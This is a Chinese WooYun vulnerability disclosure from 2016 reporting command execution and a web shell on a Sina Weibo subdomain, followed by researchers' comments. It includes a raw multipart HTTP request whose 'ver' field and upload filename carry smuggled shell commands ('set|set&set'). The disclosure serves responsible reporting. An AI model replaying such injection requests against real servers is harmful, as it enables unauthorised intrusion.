当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172756

漏洞标题:Weibo subdomain code execution&getshell

相关厂商:新浪微博

漏洞作者: 染血の雪

提交时间:2016-01-26 11:28

修复时间:2016-03-10 16:42

公开时间:2016-03-10 16:42

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-26: 细节已通知厂商并且等待厂商处理中
2016-01-26: 厂商已经确认,细节仅向厂商公开
2016-02-05: 细节向核心白帽子及相关领域专家公开
2016-02-15: 细节向普通白帽子公开
2016-02-25: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

听说标题用英文更装逼~

详细说明:

在Content-Disposition: form-data; name="ver"处可以命令执行

POST /index.php HTTP/1.1
Content-Length: 364
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NHDUMYQDQJ
Host: renmai.weibo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
-------AcunetixBoundary_NHDUMYQDQJ
Content-Disposition: form-data; name="submit"
submit
-------AcunetixBoundary_NHDUMYQDQJ
Content-Disposition: form-data; name="ver"
set|set&set
-------AcunetixBoundary_NHDUMYQDQJ
Content-Disposition: form-data; name="file"; filename=";set|set&set;"
Content-Type: image/png
-------AcunetixBoundary_NHDUMYQDQJ--


`CO1}XCP2`S2BKTC5)[A~J0.png


getshell:

19{C~QXKP9Q0)NW@QTMF`HT.png


漏洞证明:

已证明

修复方案:

你们更专业~

版权声明:转载请注明来源 染血の雪@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-01-26 13:36

厂商回复:

感谢支持,已经通知业务方处理

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-26 11:29 | Manning ( 普通白帽子 | Rank:928 漏洞数:120 | https://github.com/manning23/MSpider)

    中式英语就low逼了

  2. 2016-01-26 11:31 | godsec ( 普通白帽子 | Rank:251 漏洞数:39 | 不走小厂商,我们还是好朋友@乌云)

    你关注的白帽子 染血の雪 发表了漏洞 Weibo subdomain code execution&getshell

  3. 2016-01-26 11:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:282 漏洞数:21 | 当我又回首一切,这个世界会好吗?)

    奇葩

  4. 2016-01-26 11:41 | 小川 认证白帽子 ( 核心白帽子 | Rank:1561 漏洞数:234 | 一个致力要将乌云变成搞笑论坛的男人)

    502?

  5. 2016-01-26 11:46 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    绕过

  6. 2016-01-26 11:54 | 随风的风 ( 普通白帽子 | Rank:219 漏洞数:78 | 微信公众号:233sec 不定期分享各种漏洞思...)

    中式英语就low逼了

  7. 2016-01-26 11:58 | 中国公民 ( 路人 | Rank:25 漏洞数:12 | 脱裤不提交,提交不脱裤)

    看你说英文的方式,不是本地人吧。

  8. 2016-01-26 12:13 | iiiiiiiii ( 普通白帽子 | Rank:695 漏洞数:90 | 已死!!!!)

    就看懂了个weiboe Getshell 没文化真可怕 我要去上学了

  9. 2016-01-26 13:11 | loli 认证白帽子 ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

    这个逼装的很成功我给9分,还有91分怕你骄傲。

  10. 2016-01-26 13:14 | niliu 认证白帽子 ( 核心白帽子 | Rank:1623 漏洞数:218 | 逆流而上)

    这个逼装的很成功我给9分,还有91分怕你骄傲。

  11. 2016-01-26 13:24 | 高小厨 认证白帽子 ( 普通白帽子 | Rank:904 漏洞数:83 | 不会吹牛的小二不是好厨子!)

    这个逼装的很成功我给9分,还有91分怕你骄傲。

  12. 2016-01-26 13:45 | 染血の雪 ( 普通白帽子 | Rank:229 漏洞数:33 | 你挖 或者不挖漏洞就在哪儿不会增加 不...)

    @高小厨 一眼不见变vip了,牛逼!

  13. 2016-02-05 13:47 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:933 漏洞数:107 )

    牛逼....

  14. 2016-02-05 14:07 | mango ( 核心白帽子 | Rank:1868 漏洞数:276 | 出一份微不足道的"力")

    这尼玛也可以?? = =

  15. 2016-02-05 21:29 | scanf ( 核心白帽子 | Rank:1423 漏洞数:203 | 。)

    怎么发现的

  16. 2016-02-15 15:39 | _Thorns ( 普通白帽子 | Rank:1665 漏洞数:252 | WooYun is the Bigest gay place. 网络工...)

    这是咋发现的?白盒?